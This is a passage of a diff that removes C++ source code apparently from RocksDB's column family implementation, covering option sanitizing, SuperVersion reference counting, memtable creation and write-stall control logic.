-      delete cfd_;
-    }
-    db_->FindObsoleteFiles(&job_context, false, true);
-    mutex_->Unlock();
-    if (job_context.HaveSomethingToDelete()) {
-      db_->PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-  }
-}
-
-uint32_t ColumnFamilyHandleImpl::GetID() const { return cfd()->GetID(); }
-
-const std::string& ColumnFamilyHandleImpl::GetName() const {
-  return cfd()->GetName();
-}
-
-Status ColumnFamilyHandleImpl::GetDescriptor(ColumnFamilyDescriptor* desc) {
-#ifndef ROCKSDB_LITE
-  // accessing mutable cf-options requires db mutex.
-  InstrumentedMutexLock l(mutex_);
-  *desc = ColumnFamilyDescriptor(cfd()->GetName(), cfd()->GetLatestCFOptions());
-  return Status::OK();
-#else
-  return Status::NotSupported();
-#endif  // !ROCKSDB_LITE
-}
-
-const Comparator* ColumnFamilyHandleImpl::GetComparator() const {
-  return cfd()->user_comparator();
-}
-
-void GetIntTblPropCollectorFactory(
-    const ImmutableCFOptions& ioptions,
-    std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories) {
-  auto& collector_factories = ioptions.table_properties_collector_factories;
-  for (size_t i = 0; i < ioptions.table_properties_collector_factories.size();
-       ++i) {
-    assert(collector_factories[i]);
-    int_tbl_prop_collector_factories->emplace_back(
-        new UserKeyTablePropertiesCollectorFactory(collector_factories[i]));
-  }
-  // Add collector to collect internal key statistics
-  int_tbl_prop_collector_factories->emplace_back(
-      new InternalKeyPropertiesCollectorFactory);
-}
-
-Status CheckCompressionSupported(const ColumnFamilyOptions& cf_options) {
-  if (!cf_options.compression_per_level.empty()) {
-    for (size_t level = 0; level < cf_options.compression_per_level.size();
-         ++level) {
-      if (!CompressionTypeSupported(cf_options.compression_per_level[level])) {
-        return Status::InvalidArgument(
-            "Compression type " +
-            CompressionTypeToString(cf_options.compression_per_level[level]) +
-            " is not linked with the binary.");
-      }
-    }
-  } else {
-    if (!CompressionTypeSupported(cf_options.compression)) {
-      return Status::InvalidArgument(
-          "Compression type " +
-          CompressionTypeToString(cf_options.compression) +
-          " is not linked with the binary.");
-    }
-  }
-  return Status::OK();
-}
-
-Status CheckConcurrentWritesSupported(const ColumnFamilyOptions& cf_options) {
-  if (cf_options.inplace_update_support) {
-    return Status::InvalidArgument(
-        "In-place memtable updates (inplace_update_support) is not compatible "
-        "with concurrent writes (allow_concurrent_memtable_write)");
-  }
-  if (!cf_options.memtable_factory->IsInsertConcurrentlySupported()) {
-    return Status::InvalidArgument(
-        "Memtable doesn't concurrent writes (allow_concurrent_memtable_write)");
-  }
-  return Status::OK();
-}
-
-ColumnFamilyOptions SanitizeOptions(const ImmutableDBOptions& db_options,
-                                    const ColumnFamilyOptions& src) {
-  ColumnFamilyOptions result = src;
-  size_t clamp_max = std::conditional<
-      sizeof(size_t) == 4, std::integral_constant<size_t, 0xffffffff>,
-      std::integral_constant<uint64_t, 64ull << 30>>::type::value;
-  ClipToRange(&result.write_buffer_size, ((size_t)64) << 10, clamp_max);
-  // if user sets arena_block_size, we trust user to use this value. Otherwise,
-  // calculate a proper value from writer_buffer_size;
-  if (result.arena_block_size <= 0) {
-    result.arena_block_size = result.write_buffer_size / 8;
-
-    // Align up to 4k
-    const size_t align = 4 * 1024;
-    result.arena_block_size =
-        ((result.arena_block_size + align - 1) / align) * align;
-  }
-  result.min_write_buffer_number_to_merge =
-      std::min(result.min_write_buffer_number_to_merge,
-               result.max_write_buffer_number - 1);
-  if (result.min_write_buffer_number_to_merge < 1) {
-    result.min_write_buffer_number_to_merge = 1;
-  }
-
-  if (result.num_levels < 1) {
-    result.num_levels = 1;
-  }
-  if (result.compaction_style == kCompactionStyleLevel &&
-      result.num_levels < 2) {
-    result.num_levels = 2;
-  }
-
-  if (result.compaction_style == kCompactionStyleUniversal &&
-      db_options.allow_ingest_behind && result.num_levels < 3) {
-    result.num_levels = 3;
-  }
-
-  if (result.max_write_buffer_number < 2) {
-    result.max_write_buffer_number = 2;
-  }
-  if (result.max_write_buffer_number_to_maintain < 0) {
-    result.max_write_buffer_number_to_maintain = result.max_write_buffer_number;
-  }
-  // bloom filter size shouldn't exceed 1/4 of memtable size.
-  if (result.memtable_prefix_bloom_size_ratio > 0.25) {
-    result.memtable_prefix_bloom_size_ratio = 0.25;
-  } else if (result.memtable_prefix_bloom_size_ratio < 0) {
-    result.memtable_prefix_bloom_size_ratio = 0;
-  }
-
-  if (!result.prefix_extractor) {
-    assert(result.memtable_factory);
-    Slice name = result.memtable_factory->Name();
-    if (name.compare("HashSkipListRepFactory") == 0 ||
-        name.compare("HashLinkListRepFactory") == 0) {
-      result.memtable_factory = std::make_shared<SkipListFactory>();
-    }
-  }
-
-  if (result.compaction_style == kCompactionStyleFIFO) {
-    result.num_levels = 1;
-    // since we delete level0 files in FIFO compaction when there are too many
-    // of them, these options don't really mean anything
-    result.level0_slowdown_writes_trigger = std::numeric_limits<int>::max();
-    result.level0_stop_writes_trigger = std::numeric_limits<int>::max();
-  }
-
-  if (result.max_bytes_for_level_multiplier <= 0) {
-    result.max_bytes_for_level_multiplier = 1;
-  }
-
-  if (result.level0_file_num_compaction_trigger == 0) {
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "level0_file_num_compaction_trigger cannot be 0");
-    result.level0_file_num_compaction_trigger = 1;
-  }
-
-  if (result.level0_stop_writes_trigger <
-          result.level0_slowdown_writes_trigger ||
-      result.level0_slowdown_writes_trigger <
-          result.level0_file_num_compaction_trigger) {
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "This condition must be satisfied: "
-                   "level0_stop_writes_trigger(%d) >= "
-                   "level0_slowdown_writes_trigger(%d) >= "
-                   "level0_file_num_compaction_trigger(%d)",
-                   result.level0_stop_writes_trigger,
-                   result.level0_slowdown_writes_trigger,
-                   result.level0_file_num_compaction_trigger);
-    if (result.level0_slowdown_writes_trigger <
-        result.level0_file_num_compaction_trigger) {
-      result.level0_slowdown_writes_trigger =
-          result.level0_file_num_compaction_trigger;
-    }
-    if (result.level0_stop_writes_trigger <
-        result.level0_slowdown_writes_trigger) {
-      result.level0_stop_writes_trigger = result.level0_slowdown_writes_trigger;
-    }
-    ROCKS_LOG_WARN(db_options.info_log.get(),
-                   "Adjust the value to "
-                   "level0_stop_writes_trigger(%d)"
-                   "level0_slowdown_writes_trigger(%d)"
-                   "level0_file_num_compaction_trigger(%d)",
-                   result.level0_stop_writes_trigger,
-                   result.level0_slowdown_writes_trigger,
-                   result.level0_file_num_compaction_trigger);
-  }
-
-  if (result.soft_pending_compaction_bytes_limit == 0) {
-    result.soft_pending_compaction_bytes_limit =
-        result.hard_pending_compaction_bytes_limit;
-  } else if (result.hard_pending_compaction_bytes_limit > 0 &&
-             result.soft_pending_compaction_bytes_limit >
-                 result.hard_pending_compaction_bytes_limit) {
-    result.soft_pending_compaction_bytes_limit =
-        result.hard_pending_compaction_bytes_limit;
-  }
-
-  if (result.level_compaction_dynamic_level_bytes) {
-    if (result.compaction_style != kCompactionStyleLevel ||
-        db_options.db_paths.size() > 1U) {
-      // 1. level_compaction_dynamic_level_bytes only makes sense for
-      //    level-based compaction.
-      // 2. we don't yet know how to make both of this feature and multiple
-      //    DB path work.
-      result.level_compaction_dynamic_level_bytes = false;
-    }
-  }
-
-  if (result.max_compaction_bytes == 0) {
-    result.max_compaction_bytes = result.target_file_size_base * 25;
-  }
-
-  return result;
-}
-
-int SuperVersion::dummy = 0;
-void* const SuperVersion::kSVInUse = &SuperVersion::dummy;
-void* const SuperVersion::kSVObsolete = nullptr;
-
-SuperVersion::~SuperVersion() {
-  for (auto td : to_delete) {
-    delete td;
-  }
-}
-
-SuperVersion* SuperVersion::Ref() {
-  refs.fetch_add(1, std::memory_order_relaxed);
-  return this;
-}
-
-bool SuperVersion::Unref() {
-  // fetch_sub returns the previous value of ref
-  uint32_t previous_refs = refs.fetch_sub(1);
-  assert(previous_refs > 0);
-  return previous_refs == 1;
-}
-
-void SuperVersion::Cleanup() {
-  assert(refs.load(std::memory_order_relaxed) == 0);
-  imm->Unref(&to_delete);
-  MemTable* m = mem->Unref();
-  if (m != nullptr) {
-    auto* memory_usage = current->cfd()->imm()->current_memory_usage();
-    assert(*memory_usage >= m->ApproximateMemoryUsage());
-    *memory_usage -= m->ApproximateMemoryUsage();
-    to_delete.push_back(m);
-  }
-  current->Unref();
-}
-
-void SuperVersion::Init(MemTable* new_mem, MemTableListVersion* new_imm,
-                        Version* new_current) {
-  mem = new_mem;
-  imm = new_imm;
-  current = new_current;
-  mem->Ref();
-  imm->Ref();
-  current->Ref();
-  refs.store(1, std::memory_order_relaxed);
-}
-
-namespace {
-void SuperVersionUnrefHandle(void* ptr) {
-  // UnrefHandle is called when a thread exists or a ThreadLocalPtr gets
-  // destroyed. When former happens, the thread shouldn't see kSVInUse.
-  // When latter happens, we are in ~ColumnFamilyData(), no get should happen as
-  // well.
-  SuperVersion* sv = static_cast<SuperVersion*>(ptr);
-  if (sv->Unref()) {
-    sv->db_mutex->Lock();
-    sv->Cleanup();
-    sv->db_mutex->Unlock();
-    delete sv;
-  }
-}
-}  // anonymous namespace
-
-ColumnFamilyData::ColumnFamilyData(
-    uint32_t id, const std::string& name, Version* _dummy_versions,
-    Cache* _table_cache, WriteBufferManager* write_buffer_manager,
-    const ColumnFamilyOptions& cf_options, const ImmutableDBOptions& db_options,
-    const EnvOptions& env_options, ColumnFamilySet* column_family_set)
-    : id_(id),
-      name_(name),
-      dummy_versions_(_dummy_versions),
-      current_(nullptr),
-      refs_(0),
-      initialized_(false),
-      dropped_(false),
-      internal_comparator_(cf_options.comparator),
-      initial_cf_options_(SanitizeOptions(db_options, cf_options)),
-      ioptions_(db_options, initial_cf_options_),
-      mutable_cf_options_(initial_cf_options_),
-      is_delete_range_supported_(
-          cf_options.table_factory->IsDeleteRangeSupported()),
-      write_buffer_manager_(write_buffer_manager),
-      mem_(nullptr),
-      imm_(ioptions_.min_write_buffer_number_to_merge,
-           ioptions_.max_write_buffer_number_to_maintain),
-      super_version_(nullptr),
-      super_version_number_(0),
-      local_sv_(new ThreadLocalPtr(&SuperVersionUnrefHandle)),
-      next_(nullptr),
-      prev_(nullptr),
-      log_number_(0),
-      column_family_set_(column_family_set),
-      pending_flush_(false),
-      pending_compaction_(false),
-      prev_compaction_needed_bytes_(0),
-      allow_2pc_(db_options.allow_2pc) {
-  Ref();
-
-  // Convert user defined table properties collector factories to internal ones.
-  GetIntTblPropCollectorFactory(ioptions_, &int_tbl_prop_collector_factories_);
-
-  // if _dummy_versions is nullptr, then this is a dummy column family.
-  if (_dummy_versions != nullptr) {
-    internal_stats_.reset(
-        new InternalStats(ioptions_.num_levels, db_options.env, this));
-    table_cache_.reset(new TableCache(ioptions_, env_options, _table_cache));
-    if (ioptions_.compaction_style == kCompactionStyleLevel) {
-      compaction_picker_.reset(
-          new LevelCompactionPicker(ioptions_, &internal_comparator_));
-#ifndef ROCKSDB_LITE
-    } else if (ioptions_.compaction_style == kCompactionStyleUniversal) {
-      compaction_picker_.reset(
-          new UniversalCompactionPicker(ioptions_, &internal_comparator_));
-    } else if (ioptions_.compaction_style == kCompactionStyleFIFO) {
-      compaction_picker_.reset(
-          new FIFOCompactionPicker(ioptions_, &internal_comparator_));
-    } else if (ioptions_.compaction_style == kCompactionStyleNone) {
-      compaction_picker_.reset(new NullCompactionPicker(
-          ioptions_, &internal_comparator_));
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "Column family %s does not use any background compaction. "
-                     "Compactions can only be done via CompactFiles\n",
-                     GetName().c_str());
-#endif  // !ROCKSDB_LITE
-    } else {
-      ROCKS_LOG_ERROR(ioptions_.info_log,
-                      "Unable to recognize the specified compaction style %d. "
-                      "Column family %s will use kCompactionStyleLevel.\n",
-                      ioptions_.compaction_style, GetName().c_str());
-      compaction_picker_.reset(
-          new LevelCompactionPicker(ioptions_, &internal_comparator_));
-    }
-
-    if (column_family_set_->NumberOfColumnFamilies() < 10) {
-      ROCKS_LOG_INFO(ioptions_.info_log,
-                     "--------------- Options for column family [%s]:\n",
-                     name.c_str());
-      initial_cf_options_.Dump(ioptions_.info_log);
-    } else {
-      ROCKS_LOG_INFO(ioptions_.info_log, "\t(skipping printing options)\n");
-    }
-  }
-
-  RecalculateWriteStallConditions(mutable_cf_options_);
-}
-
-// DB mutex held
-ColumnFamilyData::~ColumnFamilyData() {
-  assert(refs_.load(std::memory_order_relaxed) == 0);
-  // remove from linked list
-  auto prev = prev_;
-  auto next = next_;
-  prev->next_ = next;
-  next->prev_ = prev;
-
-  if (!dropped_ && column_family_set_ != nullptr) {
-    // If it's dropped, it's already removed from column family set
-    // If column_family_set_ == nullptr, this is dummy CFD and not in
-    // ColumnFamilySet
-    column_family_set_->RemoveColumnFamily(this);
-  }
-
-  if (current_ != nullptr) {
-    current_->Unref();
-  }
-
-  // It would be wrong if this ColumnFamilyData is in flush_queue_ or
-  // compaction_queue_ and we destroyed it
-  assert(!pending_flush_);
-  assert(!pending_compaction_);
-
-  if (super_version_ != nullptr) {
-    // Release SuperVersion reference kept in ThreadLocalPtr.
-    // This must be done outside of mutex_ since unref handler can lock mutex.
-    super_version_->db_mutex->Unlock();
-    local_sv_.reset();
-    super_version_->db_mutex->Lock();
-
-    bool is_last_reference __attribute__((unused));
-    is_last_reference = super_version_->Unref();
-    assert(is_last_reference);
-    super_version_->Cleanup();
-    delete super_version_;
-    super_version_ = nullptr;
-  }
-
-  if (dummy_versions_ != nullptr) {
-    // List must be empty
-    assert(dummy_versions_->TEST_Next() == dummy_versions_);
-    bool deleted __attribute__((unused)) = dummy_versions_->Unref();
-    assert(deleted);
-  }
-
-  if (mem_ != nullptr) {
-    delete mem_->Unref();
-  }
-  autovector<MemTable*> to_delete;
-  imm_.current()->Unref(&to_delete);
-  for (MemTable* m : to_delete) {
-    delete m;
-  }
-}
-
-void ColumnFamilyData::SetDropped() {
-  // can't drop default CF
-  assert(id_ != 0);
-  dropped_ = true;
-  write_controller_token_.reset();
-
-  // remove from column_family_set
-  column_family_set_->RemoveColumnFamily(this);
-}
-
-ColumnFamilyOptions ColumnFamilyData::GetLatestCFOptions() const {
-  return BuildColumnFamilyOptions(initial_cf_options_, mutable_cf_options_);
-}
-
-uint64_t ColumnFamilyData::OldestLogToKeep() {
-  auto current_log = GetLogNumber();
-
-  if (allow_2pc_) {
-    auto imm_prep_log = imm()->GetMinLogContainingPrepSection();
-    auto mem_prep_log = mem()->GetMinLogContainingPrepSection();
-
-    if (imm_prep_log > 0 && imm_prep_log < current_log) {
-      current_log = imm_prep_log;
-    }
-
-    if (mem_prep_log > 0 && mem_prep_log < current_log) {
-      current_log = mem_prep_log;
-    }
-  }
-
-  return current_log;
-}
-
-const double kIncSlowdownRatio = 0.8;
-const double kDecSlowdownRatio = 1 / kIncSlowdownRatio;
-const double kNearStopSlowdownRatio = 0.6;
-const double kDelayRecoverSlowdownRatio = 1.4;
-
-namespace {
-// If penalize_stop is true, we further reduce slowdown rate.
-std::unique_ptr<WriteControllerToken> SetupDelay(
-    WriteController* write_controller, uint64_t compaction_needed_bytes,
-    uint64_t prev_compaction_need_bytes, bool penalize_stop,
-    bool auto_comapctions_disabled) {
-  const uint64_t kMinWriteRate = 16 * 1024u;  // Minimum write rate 16KB/s.
-
-  uint64_t max_write_rate = write_controller->max_delayed_write_rate();
-  uint64_t write_rate = write_controller->delayed_write_rate();
-
-  if (auto_comapctions_disabled) {
-    // When auto compaction is disabled, always use the value user gave.
-    write_rate = max_write_rate;
-  } else if (write_controller->NeedsDelay() && max_write_rate > kMinWriteRate) {
-    // If user gives rate less than kMinWriteRate, don't adjust it.
-    //
-    // If already delayed, need to adjust based on previous compaction debt.
-    // When there are two or more column families require delay, we always
-    // increase or reduce write rate based on information for one single
-    // column family. It is likely to be OK but we can improve if there is a
-    // problem.
-    // Ignore compaction_needed_bytes = 0 case because compaction_needed_bytes
-    // is only available in level-based compaction
-    //
-    // If the compaction debt stays the same as previously, we also further slow
-    // down. It usually means a mem table is full. It's mainly for the case
-    // where both of flush and compaction are much slower than the speed we
-    // insert to mem tables, so we need to actively slow down before we get
-    // feedback signal from compaction and flushes to avoid the full stop
-    // because of hitting the max write buffer number.
-    //
-    // If DB just falled into the stop condition, we need to further reduce
-    // the write rate to avoid the stop condition.
-    if (penalize_stop) {
-      // Penalize the near stop or stop condition by more aggressive slowdown.
-      // This is to provide the long term slowdown increase signal.
-      // The penalty is more than the reward of recovering to the normal
-      // condition.
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kNearStopSlowdownRatio);
-      if (write_rate < kMinWriteRate) {
-        write_rate = kMinWriteRate;
-      }
-    } else if (prev_compaction_need_bytes > 0 &&
-               prev_compaction_need_bytes <= compaction_needed_bytes) {
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kIncSlowdownRatio);
-      if (write_rate < kMinWriteRate) {
-        write_rate = kMinWriteRate;
-      }
-    } else if (prev_compaction_need_bytes > compaction_needed_bytes) {
-      // We are speeding up by ratio of kSlowdownRatio when we have paid
-      // compaction debt. But we'll never speed up to faster than the write rate
-      // given by users.
-      write_rate = static_cast<uint64_t>(static_cast<double>(write_rate) *
-                                         kDecSlowdownRatio);
-      if (write_rate > max_write_rate) {
-        write_rate = max_write_rate;
-      }
-    }
-  }
-  return write_controller->GetDelayToken(write_rate);
-}
-
-int GetL0ThresholdSpeedupCompaction(int level0_file_num_compaction_trigger,
-                                    int level0_slowdown_writes_trigger) {
-  // SanitizeOptions() ensures it.
-  assert(level0_file_num_compaction_trigger <= level0_slowdown_writes_trigger);
-
-  if (level0_file_num_compaction_trigger < 0) {
-    return std::numeric_limits<int>::max();
-  }
-
-  const int64_t twice_level0_trigger =
-      static_cast<int64_t>(level0_file_num_compaction_trigger) * 2;
-
-  const int64_t one_fourth_trigger_slowdown =
-      static_cast<int64_t>(level0_file_num_compaction_trigger) +
-      ((level0_slowdown_writes_trigger - level0_file_num_compaction_trigger) /
-       4);
-
-  assert(twice_level0_trigger >= 0);
-  assert(one_fourth_trigger_slowdown >= 0);
-
-  // 1/4 of the way between L0 compaction trigger threshold and slowdown
-  // condition.
-  // Or twice as compaction trigger, if it is smaller.
-  int64_t res = std::min(twice_level0_trigger, one_fourth_trigger_slowdown);
-  if (res >= port::kMaxInt32) {
-    return port::kMaxInt32;
-  } else {
-    // res fits in int
-    return static_cast<int>(res);
-  }
-}
-}  // namespace
-
-void ColumnFamilyData::RecalculateWriteStallConditions(
-      const MutableCFOptions& mutable_cf_options) {
-  if (current_ != nullptr) {
-    auto* vstorage = current_->storage_info();
-    auto write_controller = column_family_set_->write_controller_;
-    uint64_t compaction_needed_bytes =
-        vstorage->estimated_compaction_needed_bytes();
-
-    bool was_stopped = write_controller->IsStopped();
-    bool needed_delay = write_controller->NeedsDelay();
-
-    if (imm()->NumNotFlushed() >= mutable_cf_options.max_write_buffer_number) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(InternalStats::MEMTABLE_COMPACTION, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stopping writes because we have %d immutable memtables "
-          "(waiting for flush), max_write_buffer_number is set to %d",
-          name_.c_str(), imm()->NumNotFlushed(),
-          mutable_cf_options.max_write_buffer_number);
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               vstorage->l0_delay_trigger_count() >=
-                   mutable_cf_options.level0_stop_writes_trigger) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(InternalStats::LEVEL0_NUM_FILES_TOTAL, 1);
-      if (compaction_picker_->IsLevel0CompactionInProgress()) {
-        internal_stats_->AddCFStats(
-            InternalStats::LEVEL0_NUM_FILES_WITH_COMPACTION, 1);
-      }
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "[%s] Stopping writes because we have %d level-0 files",
-                     name_.c_str(), vstorage->l0_delay_trigger_count());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.hard_pending_compaction_bytes_limit > 0 &&
-               compaction_needed_bytes >=
-                   mutable_cf_options.hard_pending_compaction_bytes_limit) {
-      write_controller_token_ = write_controller->GetStopToken();
-      internal_stats_->AddCFStats(
-          InternalStats::HARD_PENDING_COMPACTION_BYTES_LIMIT, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stopping writes because of estimated pending compaction "
-          "bytes %" PRIu64,
-          name_.c_str(), compaction_needed_bytes);
-    } else if (mutable_cf_options.max_write_buffer_number > 3 &&
-               imm()->NumNotFlushed() >=
-                   mutable_cf_options.max_write_buffer_number - 1) {
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(InternalStats::MEMTABLE_SLOWDOWN, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stalling writes because we have %d immutable memtables "
-          "(waiting for flush), max_write_buffer_number is set to %d "
-          "rate %" PRIu64,
-          name_.c_str(), imm()->NumNotFlushed(),
-          mutable_cf_options.max_write_buffer_number,
-          write_controller->delayed_write_rate());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.level0_slowdown_writes_trigger >= 0 &&
-               vstorage->l0_delay_trigger_count() >=
-                   mutable_cf_options.level0_slowdown_writes_trigger) {
-      // L0 is the last two files from stopping.
-      bool near_stop = vstorage->l0_delay_trigger_count() >=
-                       mutable_cf_options.level0_stop_writes_trigger - 2;
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped || near_stop,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(InternalStats::LEVEL0_SLOWDOWN_TOTAL, 1);
-      if (compaction_picker_->IsLevel0CompactionInProgress()) {
-        internal_stats_->AddCFStats(
-            InternalStats::LEVEL0_SLOWDOWN_WITH_COMPACTION, 1);
-      }
-      ROCKS_LOG_WARN(ioptions_.info_log,
-                     "[%s] Stalling writes because we have %d level-0 files "
-                     "rate %" PRIu64,
-                     name_.c_str(), vstorage->l0_delay_trigger_count(),
-                     write_controller->delayed_write_rate());
-    } else if (!mutable_cf_options.disable_auto_compactions &&
-               mutable_cf_options.soft_pending_compaction_bytes_limit > 0 &&
-               vstorage->estimated_compaction_needed_bytes() >=
-                   mutable_cf_options.soft_pending_compaction_bytes_limit) {
-      // If the distance to hard limit is less than 1/4 of the gap between soft
-      // and
-      // hard bytes limit, we think it is near stop and speed up the slowdown.
-      bool near_stop =
-          mutable_cf_options.hard_pending_compaction_bytes_limit > 0 &&
-          (compaction_needed_bytes -
-           mutable_cf_options.soft_pending_compaction_bytes_limit) >
-              3 * (mutable_cf_options.hard_pending_compaction_bytes_limit -
-                   mutable_cf_options.soft_pending_compaction_bytes_limit) /
-                  4;
-
-      write_controller_token_ =
-          SetupDelay(write_controller, compaction_needed_bytes,
-                     prev_compaction_needed_bytes_, was_stopped || near_stop,
-                     mutable_cf_options.disable_auto_compactions);
-      internal_stats_->AddCFStats(
-          InternalStats::SOFT_PENDING_COMPACTION_BYTES_LIMIT, 1);
-      ROCKS_LOG_WARN(
-          ioptions_.info_log,
-          "[%s] Stalling writes because of estimated pending compaction "
-          "bytes %" PRIu64 " rate %" PRIu64,
-          name_.c_str(), vstorage->estimated_compaction_needed_bytes(),
-          write_controller->delayed_write_rate());
-    } else {
-      if (vstorage->l0_delay_trigger_count() >=
-          GetL0ThresholdSpeedupCompaction(
-              mutable_cf_options.level0_file_num_compaction_trigger,
-              mutable_cf_options.level0_slowdown_writes_trigger)) {
-        write_controller_token_ =
-            write_controller->GetCompactionPressureToken();
-        ROCKS_LOG_INFO(
-            ioptions_.info_log,
-            "[%s] Increasing compaction threads because we have %d level-0 "
-            "files ",
-            name_.c_str(), vstorage->l0_delay_trigger_count());
-      } else if (vstorage->estimated_compaction_needed_bytes() >=
-                 mutable_cf_options.soft_pending_compaction_bytes_limit / 4) {
-        // Increase compaction threads if bytes needed for compaction exceeds
-        // 1/4 of threshold for slowing down.
-        // If soft pending compaction byte limit is not set, always speed up
-        // compaction.
-        write_controller_token_ =
-            write_controller->GetCompactionPressureToken();
-        if (mutable_cf_options.soft_pending_compaction_bytes_limit > 0) {
-          ROCKS_LOG_INFO(
-              ioptions_.info_log,
-              "[%s] Increasing compaction threads because of estimated pending "
-              "compaction "
-              "bytes %" PRIu64,
-              name_.c_str(), vstorage->estimated_compaction_needed_bytes());
-        }
-      } else {
-        write_controller_token_.reset();
-      }
-      // If the DB recovers from delay conditions, we reward with reducing
-      // double the slowdown ratio. This is to balance the long term slowdown
-      // increase signal.
-      if (needed_delay) {
-        uint64_t write_rate = write_controller->delayed_write_rate();
-        write_controller->set_delayed_write_rate(static_cast<uint64_t>(
-            static_cast<double>(write_rate) * kDelayRecoverSlowdownRatio));
-        // Set the low pri limit to be 1/4 the delayed write rate.
-        // Note we don't reset this value even after delay condition is relased.
-        // Low-pri rate will continue to apply if there is a compaction
-        // pressure.
-        write_controller->low_pri_rate_limiter()->SetBytesPerSecond(write_rate /
-                                                                    4);
-      }
-    }
-    prev_compaction_needed_bytes_ = compaction_needed_bytes;
-  }
-}
-
-const EnvOptions* ColumnFamilyData::soptions() const {
-  return &(column_family_set_->env_options_);
-}
-
-void ColumnFamilyData::SetCurrent(Version* current_version) {
-  current_ = current_version;
-}
-
-uint64_t ColumnFamilyData::GetNumLiveVersions() const {
-  return VersionSet::GetNumLiveVersions(dummy_versions_);
-}
-
-uint64_t ColumnFamilyData::GetTotalSstFilesSize() const {
-  return VersionSet::GetTotalSstFilesSize(dummy_versions_);
-}
-
-MemTable* ColumnFamilyData::ConstructNewMemtable(
-    const MutableCFOptions& mutable_cf_options, SequenceNumber earliest_seq) {
-  return new MemTable(internal_comparator_, ioptions_, mutable_cf_options,
-                      write_buffer_manager_, earliest_seq, id_);
-}
-
-void ColumnFamilyData::CreateNewMemtable(
-    const MutableCFOptions& mutable_cf_options, SequenceNumber earliest_seq) {
-  if (mem_ != nullptr) {
-    delete mem_->Unref();
-  }
-  SetMemtable(ConstructNewMemtable(mutable_cf_options, earliest_seq));
-  mem_->Ref();
-}
-
-bool ColumnFamilyData::NeedsCompaction() const {
-  return compaction_picker_->NeedsCompaction(current_->storage_info());
-}
-
-Compaction* ColumnFamilyData::PickCompaction(
-    const MutableCFOptions& mutable_options, LogBuffer* log_buffer) {
-  auto* result = compaction_picker_->PickCompaction(
-      GetName(), mutable_options, current_->storage_info(), log_buffer);
-  if (result != nullptr) {
-    result->SetInputVersion(current_);
-  }
-  return result;
-}
-
-bool ColumnFamilyData::RangeOverlapWithCompaction(
-    const Slice& smallest_user_key, const Slice& largest_user_key,
-    int level) const {
-  return compaction_picker_->RangeOverlapWithCompaction(
-      smallest_user_key, largest_user_key, level);
-}
-
-const int ColumnFamilyData::kCompactAllLevels = -1;
-const int ColumnFamilyData::kCompactToBaseLevel = -2;
-
-Compaction* ColumnFamilyData::CompactRange(
-    const MutableCFOptions& mutable_cf_options, int input_level,
-    int output_level, uint32_t output_path_id, const InternalKey* begin,
-    const InternalKey* end, InternalKey** compaction_end, bool* conflict) {
-  auto* result = compaction_picker_->CompactRange(
-      GetName(), mutable_cf_options, current_->storage_info(), input_level,
-      output_level, output_path_id, begin, end, compaction_end, conflict);
-  if (result != nullptr) {
-    result->SetInputVersion(current_);
-  }
-  return result;
-}
-
-SuperVersion* ColumnFamilyData::GetReferencedSuperVersion(
-    InstrumentedMutex* db_mutex) {
-  SuperVersion* sv = nullptr;
-  sv = GetThreadLocalSuperVersion(db_mutex);
-  sv->Ref();
-  if (!ReturnThreadLocalSuperVersion(sv)) {
-    sv->Unref();
-  }
-  return sv;
-}
-
-SuperVersion* ColumnFamilyData::GetThreadLocalSuperVersion(
-    InstrumentedMutex* db_mutex) {
-  SuperVersion* sv = nullptr;
-  // The SuperVersion is cached in thread local storage to avoid acquiring
-  // mutex when SuperVersion does not change since the last use. When a new
-  // SuperVersion is installed, the compaction or flush thread cleans up
-  // cached SuperVersion in all existing thread local storage. To avoid
-  // acquiring mutex for this operation, we use atomic Swap() on the thread
-  // local pointer to guarantee exclusive access. If the thread local pointer
-  // is being used while a new SuperVersion is installed, the cached
-  // SuperVersion can become stale. In that case, the background thread would
-  // have swapped in kSVObsolete. We re-check the value at when returning
-  // SuperVersion back to thread local, with an atomic compare and swap.
-  // The superversion will need to be released if detected to be stale.
-  void* ptr = local_sv_->Swap(SuperVersion::kSVInUse);
-  // Invariant:
-  // (1) Scrape (always) installs kSVObsolete in ThreadLocal storage
-  // (2) the Swap above (always) installs kSVInUse, ThreadLocal storage
-  // should only keep kSVInUse before ReturnThreadLocalSuperVersion call
-  // (if no Scrape happens).
-  assert(ptr != SuperVersion::kSVInUse);
-  sv = static_cast<SuperVersion*>(ptr);
-  if (sv == SuperVersion::kSVObsolete ||
-      sv->version_number != super_version_number_.load()) {
-    RecordTick(ioptions_.statistics, NUMBER_SUPERVERSION_ACQUIRES);
-    SuperVersion* sv_to_delete = nullptr;
-
-    if (sv && sv->Unref()) {
-      RecordTick(ioptions_.statistics, NUMBER_SUPERVERSION_CLEANUPS);
-      db_mutex->Lock();
-      // NOTE: underlying resources held by superversion (sst files) might
-      // not be released until the next background job.
-      sv->Cleanup();
-      sv_to_delete = sv;
-    } else {
-      db_mutex->Lock();
-    }
-    sv = super_version_->Ref();
-    db_mutex->Unlock();
-
-    delete sv_to_delete;
-  }
-  assert(sv != nullptr);
-  return sv;
-}
-
